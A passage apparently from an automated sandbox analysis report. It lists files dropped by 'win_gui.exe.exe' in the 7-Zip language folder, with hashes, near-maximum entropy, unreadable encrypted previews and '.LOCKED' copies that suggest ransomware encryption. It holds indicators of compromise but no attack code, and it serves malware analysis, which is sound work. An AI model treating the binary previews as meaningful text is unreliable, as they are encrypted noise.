                                SHA-512:D4D03E83AA2F71E00C12AF7FDD44677BF471143DC5A736A13DEFF4EA20D334DDD401E6B226D37A7B6C9D2E65E0CEF1F1ED3B1A1C30B891DCD4C8CCE1BE13993B
                                Malicious:false
                                Preview:...oU...'u......Y..rPT...Q.....(......wm.....$........q.^....e2...-....G.-....x.........}Jy.?3....E0s.5;.LL......,Q.....m..9R.j.L..=....-:...\@".rn_.!".#.....s~I,+.....h..}t.U......E...I......1d..2.~.....iS..8._.^...||..l.2........AN..S.W.2C. .....I..5.@.^..^..m.Q..2...a..$8?p.(-c....w..Py.4.dUj.....$2.....F.k.Ft..RU<....~..,F\....(uN :w....W..*}..\........1@.R...e.......{.r.1L.Yr..>S0.$..Z].Z..N.kNN..4(.....O$[i\.ob..<C..}..n..l.Y....U.eO.e..Yb..(l.....m.}.D...0...Fr.'5...2|..$v...}..[...VSx......CZ...R.F....d.F2.f.z.UR ..rb1.......XNEI.8Tu=..C.;..T.w...B.EnqDDC.Q.......!............pNr..k..!.....,.#.....d...o.v.q.j1.W.+....o.[.9".{O.sF.Xq.a.j>.VWp?6.....E./^1.....f.,.I.....M.F.N................R...T.&....<3u.'...V..Y.MG....$G.[ud.E*.FIJ=T...e<......4B.I.mRS6R..]-..a.x....z|bC!...on|r./...>..^./...q`...._.f...w.<..q..%=..[1..6R1.).X.C..5.)..9y.DH.s.../n...*.h|.....M..K$.tF...].k#.u.y.|.6..?>My]...k...@....0&......m......W...3.6".#g{_..vJp..o....E....+&

                                C:\Program Files\7-Zip\Lang\co.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11560
                                Entropy (8bit):7.980960245105568
                                Encrypted:false
                                SSDEEP:192:C8zLfHklyDFdATQiIvkSocETjzp2CvHXIpPiayhA+dPRCVnR+VO7G:C8HkADFdAVxcET3NHYpP7b+VUz+VO6
                                MD5:F6A454AED91ACFEE159B161957C99D45
                                SHA1:F2B7032479182C903A9059C72BF7F9C5E128C62F
                                SHA-256:3F1879519706FE95C195C05DA47CA391736D18BAEA455AE94957FF290037BEA9
                                SHA-512:D4D03E83AA2F71E00C12AF7FDD44677BF471143DC5A736A13DEFF4EA20D334DDD401E6B226D37A7B6C9D2E65E0CEF1F1ED3B1A1C30B891DCD4C8CCE1BE13993B
                                Malicious:false
                                Preview:...oU...'u......Y..rPT...Q.....(......wm.....$........q.^....e2...-....G.-....x.........}Jy.?3....E0s.5;.LL......,Q.....m..9R.j.L..=....-:...\@".rn_.!".#.....s~I,+.....h..}t.U......E...I......1d..2.~.....iS..8._.^...||..l.2........AN..S.W.2C. .....I..5.@.^..^..m.Q..2...a..$8?p.(-c....w..Py.4.dUj.....$2.....F.k.Ft..RU<....~..,F\....(uN :w....W..*}..\........1@.R...e.......{.r.1L.Yr..>S0.$..Z].Z..N.kNN..4(.....O$[i\.ob..<C..}..n..l.Y....U.eO.e..Yb..(l.....m.}.D...0...Fr.'5...2|..$v...}..[...VSx......CZ...R.F....d.F2.f.z.UR ..rb1.......XNEI.8Tu=..C.;..T.w...B.EnqDDC.Q.......!............pNr..k..!.....,.#.....d...o.v.q.j1.W.+....o.[.9".{O.sF.Xq.a.j>.VWp?6.....E./^1.....f.,.I.....M.F.N................R...T.&....<3u.'...V..Y.MG....$G.[ud.E*.FIJ=T...e<......4B.I.mRS6R..]-..a.x....z|bC!...on|r./...>..^./...q`...._.f...w.<..q..%=..[1..6R1.).X.C..5.)..9y.DH.s.../n...*.h|.....M..K$.tF...].k#.u.y.|.6..?>My]...k...@....0&......m......W...3.6".#g{_..vJp..o....E....+&

                                C:\Program Files\7-Zip\Lang\cs.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9758
                                Entropy (8bit):7.981499585646969
                                Encrypted:false
                                SSDEEP:192:y3ekawL2mUzg/2g6WLQfIKMF4EWJxiZBGBiygdeQ+lWY+VOd6:y3ePw5UU6rq4EwxQYiypnf+VO4
                                MD5:B96E73782D709E1DE673AA52D62CFAA2
                                SHA1:84EDB9AB6E49421FC116DFF7E768D3784223DE05
                                SHA-256:78CA37EA400569C4EFB973A2E9FFEAA6386DECE03714DE624B2BD8683E6D095D
                                SHA-512:2B5EC5FF4F22ED346EAAB740296236970E309F76D9F6AE096C3FE71578DC40DE4280FAEF13A63743D516E8E315820CD0EC6884EA128868B65EDEE8BF2FA0E0EB
                                Malicious:false
                                Preview:..J[i...,@OW_...X.O.....k.b......#...]....om.5.C...Bgy/.r.%$%.......o.G.~.....}~.......N}.i.A=s..0..K..;...L..N0..S&.:..Y........f6.c7.P.@.....J.S.|.2?....V..jy*....z...m...?....3..Q(l.w.....I....c.w...4.e....=..Fw..7L..y.d.#....Xc.6.4F-.^....C..U19?..((.4.8.?$3....;.p..}....j.VR...pa.&wh..i.......?#..i..X.f.xb.67...d....UN.x....{zLT..+7..m....[ko..`Z.k...^..l............i*.L.o.[.F5Jg.z.E...?^. .]...Fm.=.)$+n....k...q..p.F....P..P.!..:Io;.P....n.0.=..F#.\.!..h..#..l...>V.....H..e..*.c.".z..7..&Y.m...r.C8x?...t-Q.v..._...W.p...#..q.ikRST...C......DL....>$..t..m.H.-=.'...w.........v..O.......I...b..|..p|.....!B...bJ,k.:~*exD..e.2P...V.B....W..p/N.RKV....J..Mb.`..e.,.........l.'..X.:!\...,....?.h.&.x.....R?.>.\-...&?.........`.VFl:...w.[..w..1T...x.M.B.4?.....:7Q.L....%\e]{.t.S..N.Ra..#.9...TY'.hmA..E..+.8j...R. q.-6,@.RU7v.:t..m..M`..@..ur...._...[F.....2y.....$..U..\?..I.....Y.BreT..xW.......0...rm.y.j;,..6W..@T.....M[.w]........JRsN

                                C:\Program Files\7-Zip\Lang\cs.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9758
                                Entropy (8bit):7.981499585646969
                                Encrypted:false
                                SSDEEP:192:y3ekawL2mUzg/2g6WLQfIKMF4EWJxiZBGBiygdeQ+lWY+VOd6:y3ePw5UU6rq4EwxQYiypnf+VO4
                                MD5:B96E73782D709E1DE673AA52D62CFAA2
                                SHA1:84EDB9AB6E49421FC116DFF7E768D3784223DE05
                                SHA-256:78CA37EA400569C4EFB973A2E9FFEAA6386DECE03714DE624B2BD8683E6D095D
                                SHA-512:2B5EC5FF4F22ED346EAAB740296236970E309F76D9F6AE096C3FE71578DC40DE4280FAEF13A63743D516E8E315820CD0EC6884EA128868B65EDEE8BF2FA0E0EB
                                Malicious:false
                                Preview:..J[i...,@OW_...X.O.....k.b......#...]....om.5.C...Bgy/.r.%$%.......o.G.~.....}~.......N}.i.A=s..0..K..;...L..N0..S&.:..Y........f6.c7.P.@.....J.S.|.2?....V..jy*....z...m...?....3..Q(l.w.....I....c.w...4.e....=..Fw..7L..y.d.#....Xc.6.4F-.^....C..U19?..((.4.8.?$3....;.p..}....j.VR...pa.&wh..i.......?#..i..X.f.xb.67...d....UN.x....{zLT..+7..m....[ko..`Z.k...^..l............i*.L.o.[.F5Jg.z.E...?^. .]...Fm.=.)$+n....k...q..p.F....P..P.!..:Io;.P....n.0.=..F#.\.!..h..#..l...>V.....H..e..*.c.".z..7..&Y.m...r.C8x?...t-Q.v..._...W.p...#..q.ikRST...C......DL....>$..t..m.H.-=.'...w.........v..O.......I...b..|..p|.....!B...bJ,k.:~*exD..e.2P...V.B....W..p/N.RKV....J..Mb.`..e.,.........l.'..X.:!\...,....?.h.&.x.....R?.>.\-...&?.........`.VFl:...w.[..w..1T...x.M.B.4?.....:7Q.L....%\e]{.t.S..N.Ra..#.9...TY'.hmA..E..+.8j...R. q.-6,@.RU7v.:t..m..M`..@..ur...._...[F.....2y.....$..U..\?..I.....Y.BreT..xW.......0...rm.y.j;,..6W..@T.....M[.w]........JRsN

                                C:\Program Files\7-Zip\Lang\cy.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5824
                                Entropy (8bit):7.965002475642252
                                Encrypted:false
                                SSDEEP:96:6gJYtolNB9eVrLFAtamt/vXhZtFL4OmhDqe9O1GEwlToQevuAVO8:RS44LFAXvXJ54lhWwlMQ+VO8
                                MD5:3E7F258BE259EDC760DAB8128A5217D2
                                SHA1:478C4EFC83DAD938581BBB8EEE3F4F1E982DA603
                                SHA-256:BBC128D1295079C29BF369F97A2EEB0537457342734ECFCF69CCD8A93CE2EC87
                                SHA-512:6EF8FA7DFEAF32AC935EA3120DB5C67B6B22D416D8517CCADEC487FBD04DACA97E377A26BA46A0C9FFE1325353092056572DC772AA6D38928F67C1B712404FD3
                                Malicious:false
                                Preview:.....Gz....,.y]..f.....[k.'.[..x.C..|2Z^\."J.]...#....0w...].U.....3.eG..I.....3..S......:.%....D.P.z^..q.....z......;.......^......_G3a......&a.7X.%.dC6.....G..0..%.!...C.5"a..m......|......."`....B&..Q......p.B..E.MK...v....T.[..]....\..5......%...q`.V...?.A....7..AeD.F....nh.....e.3/E....K..x.U!J.....X..9K.0B.>..K.....7<M..p.....@^6.-V.......sLe^.K..#`.".....H.VJ..B.{..c....S.1.n..K.7..ia./.j.>_.Az.p'p...m..Bn.|.`....m...C..[O!l.......&&.(.[.....~i..wO.....%$.......Jwy.-..;.p.C.i.J...y.....=..i.x..z...]##.....=..&...+.....l...I...b.....1.8b........a....LN..+...U.w...J..Hg..=.DVD.br.QH......r..:.5......F........E..#...F.2.......Dk2....:,wh.B^Z.aI.........+~......8..`.=..4...kt.`_:.w..E8|.Z.Z.....hc.o..c........4+$.e...q.......O......6w.....;..d.........64W.q.....M..=r...b.W..(...j.<.<^....jk$..y.(0.wd.T.Uo.{.9...u0..>*G.XX-zD..n..A{I]r..GGu...Df=..}..t....B....p...H..?Lg|.%F|~..PL.%.t...N..M..S....#9........;.Q6.P.oi..wZ..0M........?iG.<!.

                                C:\Program Files\7-Zip\Lang\cy.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5824
                                Entropy (8bit):7.965002475642252
                                Encrypted:false
                                SSDEEP:96:6gJYtolNB9eVrLFAtamt/vXhZtFL4OmhDqe9O1GEwlToQevuAVO8:RS44LFAXvXJ54lhWwlMQ+VO8
                                MD5:3E7F258BE259EDC760DAB8128A5217D2
                                SHA1:478C4EFC83DAD938581BBB8EEE3F4F1E982DA603
                                SHA-256:BBC128D1295079C29BF369F97A2EEB0537457342734ECFCF69CCD8A93CE2EC87
                                SHA-512:6EF8FA7DFEAF32AC935EA3120DB5C67B6B22D416D8517CCADEC487FBD04DACA97E377A26BA46A0C9FFE1325353092056572DC772AA6D38928F67C1B712404FD3
                                Malicious:false
                                Preview:.....Gz....,.y]..f.....[k.'.[..x.C..|2Z^\."J.]...#....0w...].U.....3.eG..I.....3..S......:.%....D.P.z^..q.....z......;.......^......_G3a......&a.7X.%.dC6.....G..0..%.!...C.5"a..m......|......."`....B&..Q......p.B..E.MK...v....T.[..]....\..5......%...q`.V...?.A....7..AeD.F....nh.....e.3/E....K..x.U!J.....X..9K.0B.>..K.....7<M..p.....@^6.-V.......sLe^.K..#`.".....H.VJ..B.{..c....S.1.n..K.7..ia./.j.>_.Az.p'p...m..Bn.|.`....m...C..[O!l.......&&.(.[.....~i..wO.....%$.......Jwy.-..;.p.C.i.J...y.....=..i.x..z...]##.....=..&...+.....l...I...b.....1.8b........a....LN..+...U.w...J..Hg..=.DVD.br.QH......r..:.5......F........E..#...F.2.......Dk2....:,wh.B^Z.aI.........+~......8..`.=..4...kt.`_:.w..E8|.Z.Z.....hc.o..c........4+$.e...q.......O......6w.....;..d.........64W.q.....M..=r...b.W..(...j.<.<^....jk$..y.(0.wd.T.Uo.{.9...u0..>*G.XX-zD..n..A{I]r..GGu...Df=..}..t....B....p...H..?Lg|.%F|~..PL.%.t...N..M..S....#9........;.Q6.P.oi..wZ..0M........?iG.<!.

                                C:\Program Files\7-Zip\Lang\da.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8973
                                Entropy (8bit):7.9795168990353496
                                Encrypted:false
                                SSDEEP:192:yfBbxh4qT6MYVHFDTyo0HIJ+E66stC9sTh4PyLLg+VOnI:y9V5YtFDXv66stEKBLg+VOnI
                                MD5:7D1D093DED754E5ABB73FE75DAE16C41
                                SHA1:9D517784684BFC1D296356E56A9FB3EFEF87E715
                                SHA-256:B57655DEC8CA1F57331C92C43428BD8CDDA2B884B1932194A15B971AEFCFF863
                                SHA-512:C4BADE6C25A7C6CFB738DDEB6D52E0D7B2FF1266D136AD77E7F9FC2B6F39571597D0589B7A9E784748264EDE977B7F744479E3C56175AE2058CECCCEA380CEA7
                                Malicious:false
                                Preview:W...cEU..L6..wT.6.dG.......P~.kF.1Y.B..Xg.HL...X.a.....e.B.=.=.U.&J...D..'..H.f.S.5...W....l........ts.?...g.^......).a.a.]X....]u....4...M..3D.R..x.....s..LW'.^%.M.m"..J..H....Z.t.d....L.....`...=..)Zz.fi?a..k)..4v.".W....Q.s.B4T.....G..GW1f...vE...C.0+0....`..).....)...|g{..).{...Q..B...O7...W?...:5U...%,.1..W...*..D.t.l7...>.HN...z......gnP.H.|....a`E.7.C5I.... ..=......I..... >V...... .....v_;..+mh8vj}........R.&......Y;4...&.)z.K+Y.4...f........z....a.g...Ti4[.G...J~...[.Q...Q.A.4...?0]...X....u.../.....".V..1%H...a.!.nl,..L`.%....Y.>..U;.....>.=Nn....[....M.R.....w.x..b.....A.-.C.}..rZ.a....L...dJ..Ytf..PF/.....nZy...J..(..z0lZ)C.:.6.4.~.Lo...b...D...X.nW...G..=u.}......L{5..Z...!n.KO........]...p..!...A.......G.wY.v...g....zO#&...3.w.=.x.z.......(O.....ror..S.a.w........l.A.].60.......&.i..V.S....2!zI.....Oq.B......'.....4.td....d....q...."...$!.u..K4H...4..Z.Oq:.r...Z:.%...U..e..YE..y...!.T....^..3..,.......p.=..

                                C:\Program Files\7-Zip\Lang\da.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8973
                                Entropy (8bit):7.9795168990353496
                                Encrypted:false
                                SSDEEP:192:yfBbxh4qT6MYVHFDTyo0HIJ+E66stC9sTh4PyLLg+VOnI:y9V5YtFDXv66stEKBLg+VOnI
                                MD5:7D1D093DED754E5ABB73FE75DAE16C41
                                SHA1:9D517784684BFC1D296356E56A9FB3EFEF87E715
                                SHA-256:B57655DEC8CA1F57331C92C43428BD8CDDA2B884B1932194A15B971AEFCFF863
                                SHA-512:C4BADE6C25A7C6CFB738DDEB6D52E0D7B2FF1266D136AD77E7F9FC2B6F39571597D0589B7A9E784748264EDE977B7F744479E3C56175AE2058CECCCEA380CEA7
                                Malicious:false
                                Preview:W...cEU..L6..wT.6.dG.......P~.kF.1Y.B..Xg.HL...X.a.....e.B.=.=.U.&J...D..'..H.f.S.5...W....l........ts.?...g.^......).a.a.]X....]u....4...M..3D.R..x.....s..LW'.^%.M.m"..J..H....Z.t.d....L.....`...=..)Zz.fi?a..k)..4v.".W....Q.s.B4T.....G..GW1f...vE...C.0+0....`..).....)...|g{..).{...Q..B...O7...W?...:5U...%,.1..W...*..D.t.l7...>.HN...z......gnP.H.|....a`E.7.C5I.... ..=......I..... >V...... .....v_;..+mh8vj}........R.&......Y;4...&.)z.K+Y.4...f........z....a.g...Ti4[.G...J~...[.Q...Q.A.4...?0]...X....u.../.....".V..1%H...a.!.nl,..L`.%....Y.>..U;.....>.=Nn....[....M.R.....w.x..b.....A.-.C.}..rZ.a....L...dJ..Ytf..PF/.....nZy...J..(..z0lZ)C.:.6.4.~.Lo...b...D...X.nW...G..=u.}......L{5..Z...!n.KO........]...p..!...A.......G.wY.v...g....zO#&...3.w.=.x.z.......(O.....ror..S.a.w........l.A.].60.......&.i..V.S....2!zI.....Oq.B......'.....4.td....d....q...."...$!.u..K4H...4..Z.Oq:.r...Z:.%...U..e..YE..y...!.T....^..3..,.......p.=..

                                C:\Program Files\7-Zip\Lang\de.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10175
                                Entropy (8bit):7.981887699423721
                                Encrypted:false
                                SSDEEP:192:GG5m8j0tiTXqZdH7j77E85/+xsQqRloVHMv6fYxfTEvPWU6+VOc:GsRSiuZdbj77BR+xsQtVV20g+VOc
                                MD5:24ADA18D4D5C039562543FBBBCF5A3EB
                                SHA1:0EB25620A1EA92F7D3F96F1E041F8FE6B46057D5
                                SHA-256:5DC8C2C79643235D8A33606278DB6C0393C90497371FE0F819CE94BC12750DE6
                                SHA-512:F07D6EC15B71785F9C19CAD6AE5E640E1E988CD8F66CF610AF69599526E032C1C56D86F1ADDFFAF4705D37F27836ACFA4ED2474282049CFB15AC14E410AA40A7
                                Malicious:false
                                Preview:Z..QR}r...1..t...f...u_eM..h....J..O_.N......;..@G..h.......m........q..d.~.A .Hk...$..VbX. )W..7...A\....#...n_1..<@h..U..h..M.}.w...F..5!..Z....j........Op.].u.dk.....M.........+.%7..*.%. .O.&\.V....C;\.F...].}1N.....3..2.R... .m.........+....L,*k;7<+lEpb.4.8.+`..9/...e.......2.K...b,5....%..&O....O8.`y.v.o.E.g.5:F.(..j..6..`...... p.Z....`..l.;..T-.[,a...p..z...z.g..U\.@.j".4O..s....h9.....p` p.yvS....M.....}-....._.Pg.O.<G.V57X.XbI.n.,..M...9..'....).`1.vKbu...6K.4.u{Q$.n7......1l..7...4L.w.........jS.^..W..lu>.+p.+1..w0.~.............\p.......#6..j.".....Oz._...D....M.p.t........C`......oX..Q...y.M~79}..u.{..V2.....:|.|..%.oO..K.r...J.q.[.8..".[7....q..oA.-...K'..........1Go.)Q...2.te.L...;...V.u..?'I..0.s..H.,x`.Zt!..e.kK}.Y.......!....v*^XW..O>....9./.*@..{Rfno...%.9)...9.6.....}a...0...d..I\3v.$..nw.o..za..L.}..7.Q.k.k........K,.L#...0Q1.`..."m>..iEB.QS.:to......3......U..(&p.....0d>......lKO.L..:. t...Y...#=....\.]rP.`$?P.

                                C:\Program Files\7-Zip\Lang\de.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10175
                                Entropy (8bit):7.981887699423721
                                Encrypted:false
                                SSDEEP:192:GG5m8j0tiTXqZdH7j77E85/+xsQqRloVHMv6fYxfTEvPWU6+VOc:GsRSiuZdbj77BR+xsQtVV20g+VOc
                                MD5:24ADA18D4D5C039562543FBBBCF5A3EB
                                SHA1:0EB25620A1EA92F7D3F96F1E041F8FE6B46057D5
                                SHA-256:5DC8C2C79643235D8A33606278DB6C0393C90497371FE0F819CE94BC12750DE6
                                SHA-512:F07D6EC15B71785F9C19CAD6AE5E640E1E988CD8F66CF610AF69599526E032C1C56D86F1ADDFFAF4705D37F27836ACFA4ED2474282049CFB15AC14E410AA40A7
                                Malicious:false
                                Preview:Z..QR}r...1..t...f...u_eM..h....J..O_.N......;..@G..h.......m........q..d.~.A .Hk...$..VbX. )W..7...A\....#...n_1..<@h..U..h..M.}.w...F..5!..Z....j........Op.].u.dk.....M.........+.%7..*.%. .O.&\.V....C;\.F...].}1N.....3..2.R... .m.........+....L,*k;7<+lEpb.4.8.+`..9/...e.......2.K...b,5....%..&O....O8.`y.v.o.E.g.5:F.(..j..6..`...... p.Z....`..l.;..T-.[,a...p..z...z.g..U\.@.j".4O..s....h9.....p` p.yvS....M.....}-....._.Pg.O.<G.V57X.XbI.n.,..M...9..'....).`1.vKbu...6K.4.u{Q$.n7......1l..7...4L.w.........jS.^..W..lu>.+p.+1..w0.~.............\p.......#6..j.".....Oz._...D....M.p.t........C`......oX..Q...y.M~79}..u.{..V2.....:|.|..%.oO..K.r...J.q.[.8..".[7....q..oA.-...K'..........1Go.)Q...2.te.L...;...V.u..?'I..0.s..H.,x`.Zt!..e.kK}.Y.......!....v*^XW..O>....9./.*@..{Rfno...%.9)...9.6.....}a...0...d..I\3v.$..nw.o..za..L.}..7.Q.k.k........K,.L#...0Q1.`..."m>..iEB.QS.:to......3......U..(&p.....0d>......lKO.L..:. t...Y...#=....\.]rP.`$?P.

                                C:\Program Files\7-Zip\Lang\el.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17505
                                Entropy (8bit):7.989100344890263
                                Encrypted:false
                                SSDEEP:384:926kOQ59mePEPY0+TrdW5xh5PjMjzXtKZ1JeVlYs+/I8sYp5GLKldRE1+VOy:92T59PEPY0Cc5xh5rw5jnPYp5No1G
                                MD5:70F17355B3BF220E7351F9CFD8EC2B83
                                SHA1:2B89529B801128330F9FE6DEF754C46250CC260F
                                SHA-256:AEE26B3DA36F61D21A57CF10765685CF1DDD7B439F521987F3746A73039F764A
                                SHA-512:35A64194777E9172B1E5242C3C0C21A5AA1D13BCB3222AE2ABB94627B84773DD1C29B1FA50BDB87BCCB7FC63E0D682C978C6264972D783B6FF8C6A62AA1E409C
                                Malicious:false
                                Preview:.....=R.<...7..)..c.K<..E.p....+./]?.|.? 3..G.?.B...E./...V.R.2.d.8.y....I.[.....B..WMr...rO.P..[0.K.K.].EV.....U%....nUZ....._...XY........`a..i....Uk\......8.0.Ake.v...A...>.r.xp......\.(.7b.K.....=..`.*.u.MYC.. .6.9...HL.&!.H..Ep...}.AG.V......hir.+...<.....=.%........6.W..7.mI...=V._..0...G. .nl....1Oo}.r..P+`.kyJ'..l..._.!{..?..I....~.....R..R..."..B..O..5..o..R?.........@{m...KPJ...k0..Pzz.J5.4..F@.D.d.(.m..{..+..6.9.pe.L..T.....M..*/t..Q..n.|..zPh........aj._.....1..+p....)Y.......C(:..C9........(.......K.U..=A....*...O.O...6....f.B7...rc......%./g..f..B........z.Z.S....V..d...kA..V?...\g..U.ll....^...Rm..".B....os.`..r....m.....d.<.........u.b.G3,..H...o.o.C.....`p...J.zb..J.....R.....|..H..n:..f(.iZ.1.W...^.v"_e..kNW.6........8....}.kk3....gs..E7.5.....cc.3p.C....t...b*p....[.....a\}.Q.k....|!..1..1;..>.....R.C.x2,.X-y.......U..R^c.......2KW+....O. .s=...#7.Z.l.u*.>......{.W..{...F.S..E....}...>...kT.nS3...N.....E.o

                                C:\Program Files\7-Zip\Lang\el.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17505
                                Entropy (8bit):7.989100344890263
                                Encrypted:false
                                SSDEEP:384:926kOQ59mePEPY0+TrdW5xh5PjMjzXtKZ1JeVlYs+/I8sYp5GLKldRE1+VOy:92T59PEPY0Cc5xh5rw5jnPYp5No1G
                                MD5:70F17355B3BF220E7351F9CFD8EC2B83
                                SHA1:2B89529B801128330F9FE6DEF754C46250CC260F
                                SHA-256:AEE26B3DA36F61D21A57CF10765685CF1DDD7B439F521987F3746A73039F764A
                                SHA-512:35A64194777E9172B1E5242C3C0C21A5AA1D13BCB3222AE2ABB94627B84773DD1C29B1FA50BDB87BCCB7FC63E0D682C978C6264972D783B6FF8C6A62AA1E409C
                                Malicious:false
                                Preview:.....=R.<...7..)..c.K<..E.p....+./]?.|.? 3..G.?.B...E./...V.R.2.d.8.y....I.[.....B..WMr...rO.P..[0.K.K.].EV.....U%....nUZ....._...XY........`a..i....Uk\......8.0.Ake.v...A...>.r.xp......\.(.7b.K.....=..`.*.u.MYC.. .6.9...HL.&!.H..Ep...}.AG.V......hir.+...<.....=.%........6.W..7.mI...=V._..0...G. .nl....1Oo}.r..P+`.kyJ'..l..._.!{..?..I....~.....R..R..."..B..O..5..o..R?.........@{m...KPJ...k0..Pzz.J5.4..F@.D.d.(.m..{..+..6.9.pe.L..T.....M..*/t..Q..n.|..zPh........aj._.....1..+p....)Y.......C(:..C9........(.......K.U..=A....*...O.O...6....f.B7...rc......%./g..f..B........z.Z.S....V..d...kA..V?...\g..U.ll....^...Rm..".B....os.`..r....m.....d.<.........u.b.G3,..H...o.o.C.....`p...J.zb..J.....R.....|..H..n:..f(.iZ.1.W...^.v"_e..kNW.6........8....}.kk3....gs..E7.5.....cc.3p.C....t...b*p....[.....a\}.Q.k....|!..1..1;..>.....R.C.x2,.X-y.......U..R^c.......2KW+....O. .s=...#7.Z.l.u*.>......{.W..{...F.S..E....}...>...kT.nS3...N.....E.o

                                C:\Program Files\7-Zip\Lang\en.ttt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8518
                                Entropy (8bit):7.975991347258941
                                Encrypted:false
                                SSDEEP:192:3He1dgh/gj8ARbxGJvCUkn/Y14nfSsbKRz7roJQY+VO+7:3He1yywARbxeVE/KPrMX+VO+7
                                MD5:8AC3F5D08D5F9D843645656D4901A31D
                                SHA1:CCDED6DDA7D0EE87AEE780DC010B4052E943D3E9
                                SHA-256:4421F680173D875E5B6C38B88E36619F3225DB33E507BF8E23844BDAE2D69BC6
                                SHA-512:30014E53096174597112EE23E3F01F52B5F58E1008D6C676F8CA1F44AF4608FA62FCE0DB6716981ACF5D1D05C9E9BCD8B332654854008E73A14490B981863714
                                Malicious:false
                                Preview:h{O>dt.`dE...UX.O....sX..|-O~..J)..Y?..5k.......S.Tz..o...9.}Wb......m.....O'.O... .x=.3....>....to.......s.wq.d...".0/...@.NkU...S..[...h.d.8...y.V`oM..BG..$.B.)..[....~.W..G..4#...D..zu?n.>5.6...>@....S...Pw...+w.V..D..J..Q....,.d.C.<e...ADCs.:..~/..B..G.p.Q.Q?.Dj....U.k..LJ._..n."q..8..4..7y......+\k....\s.k.c(.q........B. .n..'...b....w....;7.5$..].........d'3.@....J.tf.L$.z....6g..c...z........L.=....Oa..<.N..|.5..".)....[.e.....n.D(v0.^.|.&....].Q..{>s]..4......Jo<'e....$?.......I%.M.....r&u.T.!%7....G*ZA.3.6.:S..j.3....B.LC2...y').UAH.,../A...9.kf|.7N8,.vhP.......I.yvV.......+.6..F.[...... ./.._.....r..j.......2Zs$=...iT.+..opTPQ.M....F..&......wO....<..........B.c.+W...0.....mlU.Af.^.....hg.~1_.#.../u.>.3.....x.$.Io.B.i....Q.^..'.G......6w[n(.f.Rm......[...J/8n...."...B..1...J......4I.........d.B/.-....U.Ts..|D.......5..N.8.Yw.....9sg&..y........F....(._.....\.3..cW4....n.;.t..$.Q.&QQd....4E.D...)q..N.M...^d.*L...3..L..m...s...@..

                                C:\Program Files\7-Zip\Lang\en.ttt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8518
                                Entropy (8bit):7.975991347258941
                                Encrypted:false
                                SSDEEP:192:3He1dgh/gj8ARbxGJvCUkn/Y14nfSsbKRz7roJQY+VO+7:3He1yywARbxeVE/KPrMX+VO+7
                                MD5:8AC3F5D08D5F9D843645656D4901A31D
                                SHA1:CCDED6DDA7D0EE87AEE780DC010B4052E943D3E9
                                SHA-256:4421F680173D875E5B6C38B88E36619F3225DB33E507BF8E23844BDAE2D69BC6
                                SHA-512:30014E53096174597112EE23E3F01F52B5F58E1008D6C676F8CA1F44AF4608FA62FCE0DB6716981ACF5D1D05C9E9BCD8B332654854008E73A14490B981863714
                                Malicious:false
                                Preview:h{O>dt.`dE...UX.O....sX..|-O~..J)..Y?..5k.......S.Tz..o...9.}Wb......m.....O'.O... .x=.3....>....to.......s.wq.d...".0/...@.NkU...S..[...h.d.8...y.V`oM..BG..$.B.)..[....~.W..G..4#...D..zu?n.>5.6...>@....S...Pw...+w.V..D..J..Q....,.d.C.<e...ADCs.:..~/..B..G.p.Q.Q?.Dj....U.k..LJ._..n."q..8..4..7y......+\k....\s.k.c(.q........B. .n..'...b....w....;7.5$..].........d'3.@....J.tf.L$.z....6g..c...z........L.=....Oa..<.N..|.5..".)....[.e.....n.D(v0.^.|.&....].Q..{>s]..4......Jo<'e....$?.......I%.M.....r&u.T.!%7....G*ZA.3.6.:S..j.3....B.LC2...y').UAH.,../A...9.kf|.7N8,.vhP.......I.yvV.......+.6..F.[...... ./.._.....r..j.......2Zs$=...iT.+..opTPQ.M....F..&......wO....<..........B.c.+W...0.....mlU.Af.^.....hg.~1_.#.../u.>.3.....x.$.Io.B.i....Q.^..'.G......6w[n(.f.Rm......[...J/8n...."...B..1...J......4I.........d.B/.-....U.Ts..|D.......5..N.8.Yw.....9sg&..y........F....(._.....\.3..cW4....n.;.t..$.Q.&QQd....4E.D...)q..N.M...^d.*L...3..L..m...s...@..

                                C:\Program Files\7-Zip\Lang\eo.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5860
                                Entropy (8bit):7.967398328435115
                                Encrypted:false
